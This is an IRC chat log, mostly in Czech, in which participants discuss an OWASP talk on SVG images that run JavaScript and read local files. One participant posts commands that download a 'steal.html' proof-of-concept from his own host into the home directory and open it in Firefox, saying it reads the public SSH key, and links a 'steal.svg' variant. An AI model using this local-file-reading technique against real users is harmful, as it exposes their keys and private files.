- [00:41:37] <Jenda`> https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf
- [00:44:50] <atalax> "Image is an SVG and executes JavaScript locally" "Attacker can read local files (same directory, sub-folders)"
- [00:44:54] <atalax> wtf?!
- [00:50:38] <Jenda`> ano, ve firefoxu to funguje
- [00:52:27] <Jenda`> alespoň v html
- [00:52:30] <Jenda`> cd ~
- [00:52:35] <Jenda`> wget -q http://jenda.hrach.eu/steal.html
- [00:52:39] <Jenda`> firefox steal.html
- [00:52:51] <Jenda`> (nebojte, čte to *veřejný* ssh klíč)
- [00:53:43] <Mrkva> ale musim si to ulozit do ~/
- [00:54:57] <Jenda`> jj
- [00:58:52] <Jenda`> http://jenda.hrach.eu/steal.svg
- [00:59:01] <Jenda`> nobody expects…
- [00:59:28] <atalax> imho se docela zajímavý věci daj zjistit i z obsahu ~/Downloads/